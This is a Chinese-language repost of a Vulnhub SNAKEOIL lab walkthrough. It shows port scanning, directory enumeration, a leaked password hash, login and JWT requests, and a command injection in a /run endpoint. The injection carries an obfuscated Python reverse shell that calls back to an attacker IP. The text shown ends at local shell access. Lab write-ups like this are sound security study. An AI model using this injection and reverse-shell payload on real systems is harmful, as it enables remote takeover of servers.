专栏名称: 衡阳信安
船山院士网络安全团队唯一公众号,为国之安全而奋斗,为信息安全而发声!
目录
相关文章推荐
爱可可-爱生活  ·  【[204星]RapidTable:基于序列 ... ·  昨天  
黄建同学  ·  有相仿的地方。在MoE中,动态路由选择的核心 ... ·  昨天  
爱可可-爱生活  ·  【[122星]funtrace:一款为C/C ... ·  2 天前  
黄建同学  ·  Andrej Karpathy ... ·  2 天前  
爱可可-爱生活  ·  【kg-gen:从任何文本中提取知识图谱的A ... ·  3 天前  
51好读  ›  专栏  ›  衡阳信安

[Vulnhub] SNAKEOIL GoodTech+RCE+SUDO权限提升 复现

衡阳信安  · 公众号  ·  · 2024-08-03 00:00

主要观点总结

本文描述了使用nmap工具扫描IP地址192.168.101.154的TCP端口,并介绍了在该IP地址上运行的服务的详细情况。包括SSH服务、HTTP服务以及可能的代理重定向请求等。同时,文章还展示了通过POST请求登录、访问特定URL以及执行命令等操作的过程,并最终获得了本地shell访问权限和root权限。

关键观点总结

关键观点1: IP地址和端口扫描

使用nmap工具扫描IP地址192.168.101.154的TCP端口,发现开放的端口和服务。

关键观点2: 服务发现

在扫描过程中发现了SSH服务、HTTP服务,并获取了关于这些服务的详细信息。

关键观点3: 权限提升

通过一系列操作,包括POST请求登录、访问特定URL和执行命令等,最终获得了本地shell访问权限,并成功提升为root权限。

关键观点4: 敏感信息泄露

在操作过程中涉及到敏感信息,如用户名、密码、API密钥等,这些信息可能会被恶意利用。


正文

信息收集

IP Address Opening Ports
192.168.101.154 TCP :22,80,8080

$ nmap -p- 192.168.101.154 --min-rate 1000 -sC -sV 

Host is up (0.0044s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 73:a4:8f:94:a2:20:68:50:5a:ae:e1:d3:60:8d:ff:55 (RSA)
|   256 f3:1b:d8:c3:0c:3f:5e:6b:ac:99:52:80:7b:d6:b6:e7 (ECDSA)
|_  256 ea:61:64:b6:3b:d3:84:01:50:d8:1a:ab:38:29:12:e1 (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-title: Welcome to SNAKEOIL!
|_http-server-header: nginx/1.14.2
8080/tcp open  http    nginx 1.14.2
|_http-title:  Welcome to Good Tech Inc.'s Snake Oil Project
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

本地权限

$ dirb http://192.168.101.154:8080

http://192.168.101.154:8080/2

user:patrick

hash:$pbkdf2-sha256$29000$e0/J.V.rVSol5HxPqdW6Nw$FZJVgjNJIw99RIiojrT/gn9xRr9SI/RYn.CGf84r040

/registration 

POST /login HTTP/1.1
Host: 192.168.101.154:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56
Content-Type:application/json



{
  "username": "admin",
  "password": "admin123"
}

POST /login HTTP/1.1
Host: 192.168.101.154:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56
Content-Type:application/json


{
  "username": "admin",
  "password": "admin123"
}

GET /secret HTTP/1.1
Host: 192.168.101.154:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcyMTU3MDgwMCwianRpIjoiNjE5OWY5ZWMtZGQ1Ni00YzA2LTk5NjEtMjNiY2MyZmZhMDUzIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzIxNTcwODAwLCJleHAiOjE3MjE1NzE3MDB9.OASM_L1yp4HTQn-2DWL0RMqhMVmnQtwz3tj1GSMwHDc;refresh_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcyMTU3MDgwMCwianRpIjoiOWVkZmQzZDItMGQ5OS00ZGQyLWI1Y2QtOWU4OGYxZmMxMTBhIiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiJhZG1pbiIsIm5iZiI6MTcyMTU3MDgwMCwiZXhwIjoxNzIxNTc0NDAwfQ.EsxVg2G9sjpDrcSzcmUHSC1LmzWtb5a6Q0aOv57e5Yc


commandexecutionissecret 

POST /run HTTP/1.1
Host: 192.168.101.154:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 65



{"url":"127.0.0.1:22","secret_key":"commandexecutionissecret"}

POST /run HTTP/1.1
Host: 192.168.101.154:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 319




{"url":"2>null;`p='pyt';b='hon';$p$b -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.101.128\",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;ip=\"ba\";a=\"sh\"; pty.spawn(ip+a)'`", "secret_key":"commandexecutionissecret"}

Local.txt 截屏

Local.txt 内容

Local shell access obtained!







请到「今天看啥」查看全文


推荐文章
爱可可-爱生活  ·  【[204星]RapidTable:基于序列表格识别算法推理库,-20250221220846
昨天
黄建同学  ·  有相仿的地方。在MoE中,动态路由选择的核心原理类似于“智能调度-20250221075034
昨天
爱可可-爱生活  ·  【[122星]funtrace:一款为C/C++开发者量身打造的-20250220140750
2 天前
黄建同学  ·  Andrej Karpathy 关于大模型训练三个阶段,通俗易-20250220081355
2 天前
爱可可-爱生活  ·  【kg-gen:从任何文本中提取知识图谱的AI工具。亮点:1. -20250219195616
3 天前
硕士博士读书会  ·  纪念|克拉玛依大火的真相
8 年前
古墨社  ·  心有雅量,一生幸福
8 年前
微路况  ·  【导购】15万想买个高配SUV?对比博越和RX5后:不考虑合资车
7 年前
关爱八卦成长协会  ·  黄子韬大骂路人傻X!张艺兴被告事件竟然出现了反转!
7 年前
三文娱  ·  日本Rejet携手拾梦文化,将联合推出女性向游戏《执剑之刻》深耕中国女性市场 | 专访Rejet社长岩崎大介
7 年前
Sov5搜索   ·   小百科   ·   今天看啥   ·   移动版
51好读 - 好文章就要读起来!